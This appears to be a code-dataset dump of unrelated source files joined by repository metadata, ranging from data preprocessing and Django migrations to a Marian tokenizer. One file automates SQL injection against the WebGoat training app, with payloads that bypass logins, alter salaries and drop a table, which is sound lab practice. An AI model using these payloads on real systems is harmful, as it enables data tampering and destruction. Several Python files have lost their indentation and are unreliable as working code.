for d_file in DATA_FILES[:-1]:
d_file = os.path.join(DATASET_DIR, d_file)
data = pd.read_csv(d_file)
data.drop(USELESS_ROWS, axis=1, inplace=True)
dataset = pd.concat([dataset, data])
return dataset
def get_remaining_features(home, away):
df = pd.read_csv(CURR_SEASON_DATA)
# Home team and Away team
home_team = df['HomeTeam'].values
away_team = df['AwayTeam'].values
# Get the indexes for home and away team
home_idx = get_index(home_team.tolist(), home)
away_idx = get_index(away_team.tolist(), away)
# Drop string columns
df.drop(['Div', 'Date', 'HomeTeam', 'AwayTeam', 'FTR', 'HTR', 'Referee'], axis=1, inplace=True)
# Get rows where the home and away team shows up respectively
home_data = df.values[home_idx]
away_data = df.values[away_idx]
return np.average(home_data, axis=0), np.average(away_data, axis=0)
def get_index(teams, value):
value = value.title()
indexes = [i for i, team in enumerate(teams) if team == value]
return indexes
def preprocess_features(X):
# init new output dataframe
"""
Cleans up any non-numeric data.
:param X:
Features to be cleaned.
:return: output `pd.DataFrame`
A new pandas DataFrame object with clean numeric values.
"""
output = pd.DataFrame(index=X.index)
# investigate each feature col for data
for col, col_data in X.iteritems():
# if data is categorical, convert to dummy variables
if col_data.dtype == object:
            print('Categorical column found; converting to dummy variables')
col_data = pd.get_dummies(col_data, prefix=col)
# collect the converted cols
output = output.join(col_data)
return output
def process(filename=None, test_size=None, train_size=None):
"""
Process data into training and testing set.
:param filename: str or None (default is None)
The path to the `csv` file which contains the dataset. If
set to None, it will load all the datasets.
:param test_size: float, int, or None (default is None)
If float, should be between 0.0 and 1.0 and represent the
proportion of the dataset to include in the test split. If
int, represents the absolute number of test samples. If None,
the value is automatically set to the complement of the train size.
If train size is also None, test size is set to 0.25.
:param train_size: float, int, or None (default is None)
If float, should be between 0.0 and 1.0 and represent the
proportion of the dataset to include in the train split. If
int, represents the absolute number of train samples. If None,
the value is automatically set to the complement of the test size.
:return: X_train, X_test, y_train, y_test
`np.ndarray` o
"""
if filename:
data = pd.read_csv(filename)
else:
data = load_data()
print(data.columns.values)
# FTR = full time result
X_all = data.drop(['FTR'], axis=1)
y_all = data['FTR']
X_all = process_data(X_all)
# Split into training and testing data
X_train, X_test, y_train, y_test = train_test_split(X_all, y_all,
test_size=test_size, train_size=train_size,
random_state=42, stratify=y_all)
return np.array(X_train), np.array(X_test), np.array(y_train), np.array(y_test)
if __name__ == '__main__':
# home_data, away_data = get_remaining_features(home='arsenal', away='chelsea')
# print(home_data, '\n')
# print(away_data)
# data = load_data()
# print(data.tail(3))
X_train, X_test, y_train, y_test = process(filename=None)
print(X_train.shape, y_train.shape)
print(X_test.shape, y_test.shape)
| [
"[email protected]"
]
| |
b68be730fe886ebea5a66fb439c78439510f4794 | e7a46c0f63e7595a533ab58a7db07b1c12ef6092 | /begpyprog/integr.py | 6504b69f2a91ac9fcea08095da70da492eb0ce9f | []
| no_license | sockduct/Books | 263ab81b72e39a11acc83b698c76b41104d8bd20 | 954039ff4abf51bbfec05944e5175cefe232a68f | refs/heads/master | 2021-01-10T03:37:47.340931 | 2016-10-29T12:34:58 | 2016-10-29T12:34:58 | 55,922,532 | 0 | 1 | null | 2016-10-29T12:34:59 | 2016-04-10T21:06:00 | HTML | UTF-8 | Python | false | false | 970 | py | ####################################################################################################
'''
Simple program to convert a string of integers separated by commas into an integer list
'''
# Imports
import sys
from BadInput import BadInput
__version__ = '0.0.1'
def parse(input):
curlst = input.replace(' ', '')
curlst = curlst.split(',')
try:
newlst = [int(i) for i in curlst]
except ValueError as e:
raise BadInput(curlst)
#except ValueError as e:
# newlst = None
# print 'Skipping invalid input - {}'.format(str(curlst))
#except Exception as e:
# print 'Unhandled except - {}, aborting...'.format(str(e))
# sys.exit(-2)
return newlst
if __name__ == '__main__':
if len(sys.argv) < 2:
print 'Usage: {} <string of integers separated by commas> [<str2> ...]'.format(
sys.argv[0])
sys.exit(-1)
for elmt in sys.argv[1:]:
print parse(elmt)
| [
"[email protected]"
]
| |
94dbeb2675acafae474f9db4dcc4d4115a25d94f | ecae7275fd43ec93ca5771083e05ae864685faf9 | /list/list_multiplication.py | e7375b7967c1e5ea8c97cb6557e6b9a2c5eae460 | []
| no_license | shamoldas/pythonBasic | 104ca8d50099c2f511802db1f161f6d050f879cc | 3a7252a15f6d829f55700ec2ff7f7d153f3ec663 | refs/heads/main | 2023-01-09T06:38:55.357476 | 2020-11-11T12:27:31 | 2020-11-11T12:27:31 | 311,960,017 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 97 | py | import numpy as np
a = [1,2,3,4]
b = [2,3,4,5]
# Plain Python lists do not support elementwise '*': a * b raises TypeError.
# The pure-Python equivalent of the NumPy call below is a comprehension:
d = [x * y for x, y in zip(a, b)]
print(d)
c=np.multiply(a,b)
print(c)
| [
"[email protected]"
]
| |
8bf6f30a0b6898775a955c99c1135e2fb41fbb1c | 9f46d82b1bbb561d663fbdbaa14331b9193fb18d | /buses/migrations/0002_auto_20200903_0438.py | eba7853d4e57eefbd553a172fc37a6f95240605f | []
| no_license | ziaurjoy/simple-class-based | 32012b56bb727ca5891d3938b024cdda4c4f30c8 | 9fd881d83e2e573c7974caeefc89bb7b03a78a05 | refs/heads/master | 2022-12-07T23:50:03.114676 | 2020-09-07T14:11:06 | 2020-09-07T14:11:06 | 293,546,616 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 816 | py | # Generated by Django 3.1 on 2020-09-03 04:38
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('buses', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='bussescompany',
options={'verbose_name_plural': 'bus companis'},
),
migrations.CreateModel(
name='Bus',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('serial_number', models.CharField(db_index=True, max_length=15)),
('operator', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='buses.bussescompany')),
],
),
]
| [
"[email protected]"
]
| |
e411a3f2ff7be97ff72496885a1285324ae4b0cd | b40d1a26ea04a19ec0da7bf55db84b7ee36cc898 | /leetcode.com/python/895_Maximum_Frequency_Stack.py | b083d8b11400faa43d9540631aac9d70eb9f35a3 | [
"MIT"
]
| permissive | partho-maple/coding-interview-gym | 5e8af7d404c28d4b9b52e5cffc540fd51d8025cf | 20ae1a048eddbc9a32c819cf61258e2b57572f05 | refs/heads/master | 2022-09-11T16:36:01.702626 | 2022-03-14T08:39:47 | 2022-03-14T08:39:47 | 69,802,909 | 862 | 438 | MIT | 2022-08-18T06:42:46 | 2016-10-02T14:51:31 | Python | UTF-8 | Python | false | false | 797 | py | from collections import defaultdict
import heapq
class FreqStack(object):
def __init__(self):
self.counter = defaultdict(int)
self.stackIdx = -1 # initially the stack is empty
self.maxHeap = []
def push(self, x):
"""
:type x: int
:rtype: None
"""
self.counter[x] += 1
self.stackIdx += 1
heapq.heappush(self.maxHeap, (-self.counter[x], -self.stackIdx, x))
def pop(self):
"""
:rtype: int
"""
topElement = heapq.heappop(self.maxHeap)
count, idx, x = -topElement[0], -topElement[1], topElement[2]
self.counter[x] -= 1
return x
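# --- Added note and sketch (not part of the original solution) ---
# The heap version above makes push/pop O(log n). The classic O(1) variant
# keeps one stack per frequency; the same push/pop API is assumed below.
class FreqStackO1(object):
    def __init__(self):
        self.freq = defaultdict(int)    # value -> current frequency
        self.group = defaultdict(list)  # frequency -> stack of values
        self.maxfreq = 0
    def push(self, x):
        self.freq[x] += 1
        self.maxfreq = max(self.maxfreq, self.freq[x])
        self.group[self.freq[x]].append(x)
    def pop(self):
        x = self.group[self.maxfreq].pop()
        self.freq[x] -= 1
        if not self.group[self.maxfreq]:
            self.maxfreq -= 1
        return x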
# Your FreqStack object will be instantiated and called as such:
# obj = FreqStack()
# obj.push(x)
# param_2 = obj.pop()
| [
"[email protected]"
]
| |
7c5f10be6bb29de0efad4fe84a70e7dd2449fd64 | 62e58c051128baef9452e7e0eb0b5a83367add26 | /edifact/D01B/MSCONSD01BUN.py | eb4f55884635f28f92c53726be35f53eb089349d | []
| no_license | dougvanhorn/bots-grammars | 2eb6c0a6b5231c14a6faf194b932aa614809076c | 09db18d9d9bd9d92cefbf00f1c0de1c590fe3d0d | refs/heads/master | 2021-05-16T12:55:58.022904 | 2019-05-17T15:22:23 | 2019-05-17T15:22:23 | 105,274,633 | 0 | 0 | null | 2017-09-29T13:21:21 | 2017-09-29T13:21:21 | null | UTF-8 | Python | false | false | 1,763 | py | #Generated by bots open source edi translator from UN-docs.
from bots.botsconfig import *
from edifact import syntax
from recordsD01BUN import recorddefs
structure = [
{ID: 'UNH', MIN: 1, MAX: 1, LEVEL: [
{ID: 'BGM', MIN: 1, MAX: 1},
{ID: 'DTM', MIN: 1, MAX: 9},
{ID: 'CUX', MIN: 0, MAX: 9},
{ID: 'RFF', MIN: 0, MAX: 9, LEVEL: [
{ID: 'DTM', MIN: 0, MAX: 9},
]},
{ID: 'NAD', MIN: 0, MAX: 99, LEVEL: [
{ID: 'RFF', MIN: 0, MAX: 9, LEVEL: [
{ID: 'DTM', MIN: 0, MAX: 9},
]},
{ID: 'CTA', MIN: 0, MAX: 9, LEVEL: [
{ID: 'COM', MIN: 0, MAX: 9},
]},
]},
{ID: 'UNS', MIN: 1, MAX: 1},
{ID: 'NAD', MIN: 1, MAX: 99999, LEVEL: [
{ID: 'LOC', MIN: 1, MAX: 99999, LEVEL: [
{ID: 'DTM', MIN: 0, MAX: 9},
{ID: 'RFF', MIN: 0, MAX: 99, LEVEL: [
{ID: 'DTM', MIN: 0, MAX: 9},
]},
{ID: 'CCI', MIN: 0, MAX: 99, LEVEL: [
{ID: 'DTM', MIN: 0, MAX: 99},
]},
{ID: 'LIN', MIN: 0, MAX: 99999, LEVEL: [
{ID: 'PIA', MIN: 0, MAX: 9},
{ID: 'IMD', MIN: 0, MAX: 9},
{ID: 'PRI', MIN: 0, MAX: 9},
{ID: 'NAD', MIN: 0, MAX: 9},
{ID: 'MOA', MIN: 0, MAX: 9},
{ID: 'QTY', MIN: 1, MAX: 9999, LEVEL: [
{ID: 'DTM', MIN: 0, MAX: 9},
{ID: 'STS', MIN: 0, MAX: 9},
]},
{ID: 'CCI', MIN: 0, MAX: 99, LEVEL: [
{ID: 'MEA', MIN: 0, MAX: 99},
{ID: 'DTM', MIN: 0, MAX: 9},
]},
]},
]},
]},
{ID: 'CNT', MIN: 0, MAX: 99},
{ID: 'UNT', MIN: 1, MAX: 1},
]},
]
| [
"[email protected]"
]
| |
6f5980258752082c35aaff63112e57d84ac32d19 | 21fec19cb8f74885cf8b59e7b07d1cd659735f6c | /chapter_13/getone-urllib.py | 879783dfb46bea3276181cea113fd47ade1bf7c0 | [
"MIT"
]
| permissive | bimri/programming_python | ec77e875b9393179fdfb6cbc792b3babbdf7efbe | ba52ccd18b9b4e6c5387bf4032f381ae816b5e77 | refs/heads/master | 2023-09-02T12:21:11.898011 | 2021-10-26T22:32:34 | 2021-10-26T22:32:34 | 394,783,307 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,020 | py | "Using urllib to Download Files"
'''
Python urllib.request module: given an Internet address
string—a URL, or Universal Resource Locator—this module opens a connection
to the specified server and returns a file-like object ready to be read with normal file
object method calls (e.g., read, readline).
We can use such a higher-level interface to download anything with an address on the
Web—files published by FTP sites (using URLs that start with ftp://); web pages and
output of scripts that live on remote servers (using http:// URLs); and even local files
(using file:// URLs).
'''
#!/usr/local/bin/python
"""
A Python script to download a file by FTP by its URL string; use higher-level
urllib instead of ftplib to fetch file; urllib supports FTP, HTTP, client-side
HTTPS, and local files, and handles proxies, redirects, cookies, and more;
urllib also allows downloads of html pages, images, text, etc.; see also
Python html/xml parsers for web pages fetched by urllib in Chapter 19;
"""
import os, getpass
from urllib.request import urlopen # socket-based web tools
filename = 'monkeys.jpg' # remote/local filename
password = getpass.getpass('Pswd?')
remoteaddr = 'ftp://lutz:%[email protected]/%s;type=i' % (password, filename)
print('Downloading', remoteaddr)
# this works too:
# urllib.request.urlretrieve(remoteaddr, filename)
remotefile = urlopen(remoteaddr) # return input file-like object
localfile = open(filename, 'wb') # where to store data locally
localfile.write(remotefile.read())
localfile.close()
remotefile.close()
'''
Technically speaking, urllib.request supports a variety of Internet protocols (HTTP,
FTP, and local files). Unlike ftplib, urllib.request is generally used for reading remote
objects, not for writing or uploading them (though the HTTP and FTP protocols support
file uploads too). As with ftplib, retrievals must generally be run in threads if
blocking is a concern.
'''
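# --- Added illustration (not part of the original script) ---
# The same urlopen call reads HTTP resources too; the URL below is a
# placeholder assumption:
#
#     from urllib.request import urlopen
#     html = urlopen('http://learning-python.com').read()
#     print(html[:80])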
| [
"[email protected]"
]
| |
1d4682439a3ec9cebb7221e6ed9577f7be10a86c | 41cd61226440c7f0a6fcf77f7e4f65e65c28aaa1 | /wg_auto/a1_inject/sql_injection/intro.py | 2a1bcbc73989354939d03940f43f8d0cb3c7b42d | []
| no_license | xx-zhang/webgoat_auto | 6d99d98148e180b6eacf46c5d2b4de81b552fb1e | 8d47d6af68530940987a272224e9c21f870bf402 | refs/heads/master | 2023-04-03T22:24:54.675321 | 2021-04-16T09:23:30 | 2021-04-16T09:23:30 | 358,497,165 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,860 | py | # coding:utf-8
from wg_auto.base import request_wrap
def sql2_test(q="select department from employees where first_name='Bob' and last_name='Franco'"):
__url = '/SqlInjection/attack2'
return request_wrap(method='post', url=__url, data={"query": q})
def sql3_test(q="update employees set department='Sales' where "
"first_name='Tobi' and last_name='Barnett'"):
__url = '/SqlInjection/attack3'
return request_wrap(method='post', url=__url, data={"query": q})
def sql4_test(q='alter table employees add phone varchar(20)'):
__url = '/SqlInjection/attack4'
return request_wrap(method='post', url=__url, data={"query": q})
def sql5_test(q='grant alter table to UnauthorizedUser'):
__url = '/SqlInjection/attack5'
return request_wrap(method='post', url=__url, data={"query": q})
def sql9_test():
__url = "/SqlInjection/assignment5a"
data = {"account": "Smith'", "operator": "or", "injection": "'1'='1"}
return request_wrap(method='post', url=__url, data=data)
def sql10_test():
__url = "/SqlInjection/assignment5b"
data = {"login_count": "1", "userid": "1 or 1=1"}
return request_wrap(method='post', url=__url, data=data)
def sql11_test():
__url = "/SqlInjection/attack8"
data = {"name": "Smith", "auth_tan": "1' or '1'='1"}
return request_wrap(method='post', url=__url, data=data)
def sql12_test():
__url = "/SqlInjection/attack9"
# data = {"name": "Smith", "auth_tan": "3SL99A' or '1'='1"}
data = {"name": "Smith", "auth_tan": "1' or 1=1;update employees set salary = 90000 where last_name = 'Smith';--+"}
return request_wrap(method='post', url=__url, data=data)
def sql13_test():
__url = "/SqlInjection/attack10"
data = {"action_string": "1' or 1=1;drop table access_log;--"}
return request_wrap(method='post', url=__url, data=data)
| [
"[email protected]"
]
| |
a40a61da4b281943142d8d4709eff02cb23d9dca | 2ca3b6cc4f9145438e283d4e055e55fff550ec90 | /flask/hello.py | 68f2d487bdd7eac37fde1aad5bf11e7ee96000bc | []
| no_license | manuck/python_practice | e39a7e3be41608dd9bf8a7bdb9228a22ceb652b6 | 7adbefbe616f305430c75e896d817ec8e7f938d3 | refs/heads/master | 2020-04-12T02:45:06.427693 | 2018-12-21T01:15:31 | 2018-12-21T01:15:31 | 162,252,332 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,053 | py | from flask import Flask, render_template
import datetime
import random
app = Flask(__name__)
@app.route("/")
def hello():
return render_template("index.html")
@app.route("/ssafy")
def ssafy():
return "방가방가룽~"
@app.route("/isitchristmas")
def christmas():
    today = datetime.datetime.now()
    if today.month == 12 and today.day == 25:
        return "yes"
    else:
        return "no"
# variable routing
@app.route("/greeting/<string:name>")
def greeting(name):
return f"{name} 안녕하십니까? 인사 오지게 박습니다."
@app.route("/cube/<int:num>")
def cube(num):
sq = num**3
return f"{sq}"
@app.route("/dinner")
def dinner():
menu = ["햄버거", "수육", "치킨"]
dinner = random.choice(menu)
return render_template("dinner.html", dinner=dinner, menu=menu)
@app.route("/music")
def music():
mlist = ["아이유-이름에게", "멜로망스-욕심", "태연-기억을 걷는 시간"]
music = random.choice(mlist)
return render_template("music.html", music=music, mlist=mlist) | [
"[email protected]"
]
| |
db619209d99e9c11e7884096814e36d0ecfb565e | bdfd3937f6222157d436dbdc7d7efad2b1b3f8f6 | /appengine/logging/writing_logs/main_test.py | 339caa4ef66206268f60e87b58a9339a9577a20d | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
]
| permissive | b-fong/python-docs-samples | 81f089db6f4378cb7cfd278d3c8f9fb198aeb504 | 493f850306f7860a85948365ba4ee70500bec0d6 | refs/heads/master | 2020-12-25T08:37:37.864777 | 2016-02-17T22:54:50 | 2016-02-17T22:54:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 991 | py | # Copyright 2015 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from testing import AppEngineTest
import webtest
from . import main
class TestWritingLogs(AppEngineTest):
def setUp(self):
super(TestWritingLogs, self).setUp()
self.app = webtest.TestApp(main.app)
def test_get(self):
response = self.app.get('/')
self.assertEqual(response.status_int, 200)
self.assertTrue('Logging example' in response.text)
| [
"[email protected]"
]
| |
c531e8963a8bdd1fd5685361f3d120b112d7931c | f0acc407f95b758fa734f5ed5f6506a8b20d2706 | /docs_src/parameter_types/bool/tutorial004_an.py | 1cb42fcc86f69fbffbf6fb0cd4576c958c05ba79 | [
"MIT"
]
| permissive | shnups/typer | ede6d86c5b169e8caa7823b0552f8531ed041f84 | e0b207f3f577cb2e59fdd60da39686a2f5ed0e77 | refs/heads/master | 2023-08-31T01:54:21.168547 | 2023-08-01T09:36:09 | 2023-08-01T09:36:09 | 313,047,732 | 0 | 0 | MIT | 2020-11-15T14:22:06 | 2020-11-15T14:22:05 | null | UTF-8 | Python | false | false | 276 | py | import typer
from typing_extensions import Annotated
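# Note: the " /--demo" and " /-d" strings declare only the secondary (off)
# switch for this boolean, so passing --demo (or -d) sets in_prod to False,
# while omitting the flag leaves the default of True.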
def main(in_prod: Annotated[bool, typer.Option(" /--demo", " /-d")] = True):
if in_prod:
print("Running in production")
else:
print("Running demo")
if __name__ == "__main__":
typer.run(main)
| [
"[email protected]"
]
| |
66034e4237f03e3feea6cf0c1cb3a5d2f84b4f3e | 7f81c7b4110640f73b769b6a41e9ef3ae2495611 | /bert_multitask_learning/__init__.py | e9e702d00da1d9e2c6bc914b6a59975fe2a14257 | [
"Apache-2.0"
]
| permissive | ml2457/bert-multitask-learning | 26464c6d1ad94e7aeebd93d02f2604298ebde5db | 993c1e6ca279e90e12ce4a684260219b18bbea70 | refs/heads/master | 2023-02-10T14:05:27.643723 | 2021-01-10T15:22:11 | 2021-01-10T15:22:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 314 | py | __version__ = "0.6.10"
from .read_write_tfrecord import *
from .input_fn import *
from .model_fn import *
from .params import *
from .top import *
from .run_bert_multitask import *
from .utils import *
from .preproc_decorator import preprocessing_fn
from . import predefined_problems
from .special_tokens import *
| [
"[email protected]"
]
| |
f78963add4b60ef66c7ce35ce18852ad3a6e9be9 | 33daf4c69a8f46d7ad8d93eaa73fc60e36fd022d | /gestion/asignaciones/20150908-todos-cuerpos/procesar_tabla.py~ | 6817418317f466cb6fa5e7e4a9ff2c5abf0fe429 | []
| no_license | OscarMaestre/estructurado | 81cfc9412b77d5015be1bebf66785c357746d8e2 | 7649747e48128cb9c17dee937574e9490fcc9087 | refs/heads/master | 2021-01-10T15:05:47.695362 | 2016-04-28T07:30:50 | 2016-04-28T07:30:50 | 53,923,820 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,671 | #!/usr/bin/env python3
import re
import sys
import os
NUM_SUBDIRECTORIOS_ANTERIORES=1
SEPARADOR=os.sep
RUTA_PAQUETE_BD=(".."+SEPARADOR) * NUM_SUBDIRECTORIOS_ANTERIORES
DIRECTORIO= RUTA_PAQUETE_BD + "db_nombramientos"
#aqui = os.path.dirname(os.path.abspath(__file__))
sys.path.insert(0, DIRECTORIO)
import GestorDB
import ListaCampos
archivo=sys.argv[1]
re_dni="[0-9]{7,8}[A-Z]"
#especialidad="[PWB0]59[0-9][0-9]{3}"
re_especialidad="\- [PWB0]59([0-9]{4})"
re_codigo_centro="[0-9]{8}"
re_codigo_centro_ciudad_real="^13[0-9]{6}$"
re_fecha="[0-9]{2}/[0-9]{2}/[0-9]{4}"
def linea_contiene_patron(patron, linea):
expresion=re.compile(patron)
if expresion.search(linea):
return True
return False
def extraer_patron(patron, linea):
expresion=re.compile(patron)
concordancia=expresion.search(linea)
if concordancia:
inicio=concordancia.start()
final=concordancia.end()
return concordancia.string[inicio:final]
print ("No concordancia")
def extraer_codigo_centro(linea):
return extraer_patron(re_codigo_centro, linea)
def extraer_localidad(linea):
localidad=linea[9:51]
return localidad.strip()
def extraer_dni(linea):
    trozo = linea[51:60]
    return extraer_patron(re_dni, trozo)
def extraer_nombre(linea):
linea=linea[49:]
pos=linea.find("-")
if pos==-1:
return "Error:"+linea
return linea[pos+2:].strip()
cadena_sql="""insert into asignaciones_18092015 values
(
*C1*'{0}'*C1*,
*C2*'{1}'*C2*,
*C3*'{2}'*C3*,
*C4*'{3}'*C4*,
*C5*'{4}'*C5*,
*C6*'{5}'*C6*,
*C7*'{6}'*C7*,
*C8*'{7}'*C8*
);
"""
def generar_linea_sql(lista_campos):
dni=lista_campos[0]
cod_centro=lista_campos[3]
fecha_fin=lista_campos[7]
if not linea_contiene_patron(re_codigo_centro_ciudad_real, cod_centro):
cod_centro="9888"
sql= "update gaseosa set cod_centro='"+cod_centro+"' where dni='"+dni+"';\n"
sql+="update gaseosa set auxiliar='HACIENDO SUSTITUCION HASTA "+fecha_fin+"' where dni='"+dni+"';\n"
return sql
def generar_linea_sql2(lista_campos):
valores=":".join(lista_campos)
return valores
archivo=open(archivo,"r")
lineas=archivo.readlines()
total_lineas=len(lineas)
codigo_especialidad=""
lista_inserts_sql3=[]
i = 0
while i < total_lineas:
    linea = lineas[i]
    lista_campos = []
    lista_campos_para_insertar = ListaCampos.ListaCampos()
    if linea_contiene_patron(re_especialidad, linea):
        codigo_especialidad = extraer_patron(re_especialidad, linea)
    if linea_contiene_patron(re_dni, linea):
        linea_limpia = linea.strip()
        codigo_centro = extraer_codigo_centro(linea_limpia)
        localidad = extraer_localidad(linea_limpia)
        dni = extraer_dni(linea_limpia)
        nombre = extraer_nombre(linea_limpia)
        linea_siguiente = lineas[i + 1]
        nombre_centro = linea_siguiente[0:51].strip()
        trozo_fecha1 = linea_siguiente[72:132]
        fecha_1 = extraer_patron(re_fecha, trozo_fecha1)
        trozo_fecha2 = linea_siguiente[133:]
        fecha_2 = extraer_patron(re_fecha, trozo_fecha2)
        lista_campos = [dni, nombre, codigo_especialidad, codigo_centro, nombre_centro, localidad, fecha_1, fecha_2]
        linea_sql = generar_linea_sql(lista_campos)
        lista_campos_para_insertar.anadir("nif", dni, ListaCampos.ListaCampos.CADENA)
        lista_campos_para_insertar.anadir("nombre_completo", nombre, ListaCampos.ListaCampos.CADENA)
        lista_campos_para_insertar.anadir("fecha_inicio", fecha_1, ListaCampos.ListaCampos.CADENA)
        lista_campos_para_insertar.anadir("fecha_fin", fecha_2, ListaCampos.ListaCampos.CADENA)
        lista_campos_para_insertar.anadir("procedimiento", "Adjudicacion 08-09-2015", ListaCampos.ListaCampos.CADENA)
        lista_campos_para_insertar.anadir("especialidad", codigo_especialidad, ListaCampos.ListaCampos.CADENA)
        lista_campos_para_insertar.anadir("codigo_centro", codigo_centro, ListaCampos.ListaCampos.CADENA)
        print(linea_sql)
        # print(cadena_sql.format(codigo_especialidad, codigo_centro, localidad, dni, nombre, nombre_centro, fecha_1, fecha_2))
        lista_inserts_sql3.append(lista_campos_para_insertar.generar_insert("nombramientos"))
        i = i + 1  # skip the detail line already consumed via lineas[i + 1]
    i = i + 1
archivo.close()
GestorDB.BD_RESULTADOS.ejecutar_sentencias(lista_inserts_sql3)
| [
"[email protected]"
]
| ||
233ad6379183648285b533d82dfc4da333fbcf94 | 1b2a1f807b98034567e936b9b5c76c2fc89b908a | /adj_tf/models/marian/tokenization_marian.py | 2eec924e0878443bd77b620a91f78c0f333ee2ec | []
| no_license | Adreambottle/Transformer2GP | 48c955d8eb155caef4c24a3c03ee3aa9ab0bd3da | 5ba1a5005c2ad21066304cdeb1d7c2587c8191da | refs/heads/main | 2023-07-07T14:17:51.673437 | 2021-08-17T14:14:56 | 2021-08-17T14:14:56 | 397,279,894 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,967 | py | # Copyright 2020 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import re
import warnings
from contextlib import contextmanager
from pathlib import Path
from shutil import copyfile
from typing import Dict, List, Optional, Tuple, Union
import sentencepiece
from ...tokenization_utils import PreTrainedTokenizer
vocab_files_names = {
"source_spm": "source.spm",
"target_spm": "target.spm",
"vocab": "vocab.json",
"tokenizer_config_file": "tokenizer_config.json",
}
PRETRAINED_VOCAB_FILES_MAP = {
"source_spm": {"Helsinki-NLP/opus-mt-en-de": "https://cdn.huggingface.co/Helsinki-NLP/opus-mt-en-de/source.spm"},
"target_spm": {"Helsinki-NLP/opus-mt-en-de": "https://cdn.huggingface.co/Helsinki-NLP/opus-mt-en-de/target.spm"},
"vocab": {"Helsinki-NLP/opus-mt-en-de": "https://cdn.huggingface.co/Helsinki-NLP/opus-mt-en-de/vocab.json"},
"tokenizer_config_file": {
"Helsinki-NLP/opus-mt-en-de": "https://cdn.huggingface.co/Helsinki-NLP/opus-mt-en-de/tokenizer_config.json"
},
}
PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = {"Helsinki-NLP/opus-mt-en-de": 512}
PRETRAINED_INIT_CONFIGURATION = {}
# Example URL https://huggingface.co/Helsinki-NLP/opus-mt-en-de/resolve/main/vocab.json
class MarianTokenizer(PreTrainedTokenizer):
r"""
Construct a Marian tokenizer. Based on `SentencePiece <https://github.com/google/sentencepiece>`__.
This tokenizer inherits from :class:`~transformers.PreTrainedTokenizer` which contains most of the main methods.
Users should refer to this superclass for more information regarding those methods.
Args:
source_spm (:obj:`str`):
`SentencePiece <https://github.com/google/sentencepiece>`__ file (generally has a .spm extension) that
contains the vocabulary for the source language.
target_spm (:obj:`str`):
`SentencePiece <https://github.com/google/sentencepiece>`__ file (generally has a .spm extension) that
contains the vocabulary for the target language.
source_lang (:obj:`str`, `optional`):
A string representing the source language.
target_lang (:obj:`str`, `optional`):
A string representing the target language.
unk_token (:obj:`str`, `optional`, defaults to :obj:`"<unk>"`):
The unknown token. A token that is not in the vocabulary cannot be converted to an ID and is set to be this
token instead.
eos_token (:obj:`str`, `optional`, defaults to :obj:`"</s>"`):
The end of sequence token.
pad_token (:obj:`str`, `optional`, defaults to :obj:`"<pad>"`):
The token used for padding, for example when batching sequences of different lengths.
model_max_length (:obj:`int`, `optional`, defaults to 512):
The maximum sentence length the model accepts.
additional_special_tokens (:obj:`List[str]`, `optional`, defaults to :obj:`["<eop>", "<eod>"]`):
Additional special tokens used by the tokenizer.
Examples::
>>> from adj_tf import MarianTokenizer
>>> tok = MarianTokenizer.from_pretrained('Helsinki-NLP/opus-mt-en-de')
>>> src_texts = [ "I am a small frog.", "Tom asked his teacher for advice."]
>>> tgt_texts = ["Ich bin ein kleiner Frosch.", "Tom bat seinen Lehrer um Rat."] # optional
>>> batch_enc = tok.prepare_seq2seq_batch(src_texts, tgt_texts=tgt_texts, return_tensors="pt")
>>> # keys [input_ids, attention_mask, labels].
>>> # model(**batch) should work
"""
vocab_files_names = vocab_files_names
pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP
pretrained_init_configuration = PRETRAINED_INIT_CONFIGURATION
max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES
model_input_names = ["input_ids", "attention_mask"]
language_code_re = re.compile(">>.+<<") # type: re.Pattern
def __init__(
self,
vocab,
source_spm,
target_spm,
source_lang=None,
target_lang=None,
unk_token="<unk>",
eos_token="</s>",
pad_token="<pad>",
model_max_length=512,
**kwargs
):
super().__init__(
# bos_token=bos_token, unused. Start decoding with config.decoder_start_token_id
source_lang=source_lang,
target_lang=target_lang,
unk_token=unk_token,
eos_token=eos_token,
pad_token=pad_token,
model_max_length=model_max_length,
**kwargs,
)
assert Path(source_spm).exists(), f"cannot find spm source {source_spm}"
self.encoder = load_json(vocab)
if self.unk_token not in self.encoder:
raise KeyError("<unk> token must be in vocab")
assert self.pad_token in self.encoder
self.decoder = {v: k for k, v in self.encoder.items()}
self.source_lang = source_lang
self.target_lang = target_lang
self.supported_language_codes: list = [k for k in self.encoder if k.startswith(">>") and k.endswith("<<")]
self.spm_files = [source_spm, target_spm]
# load SentencePiece model for pre-processing
self.spm_source = load_spm(source_spm)
self.spm_target = load_spm(target_spm)
self.current_spm = self.spm_source
# Multilingual target side: default to using first supported language code.
self._setup_normalizer()
def _setup_normalizer(self):
try:
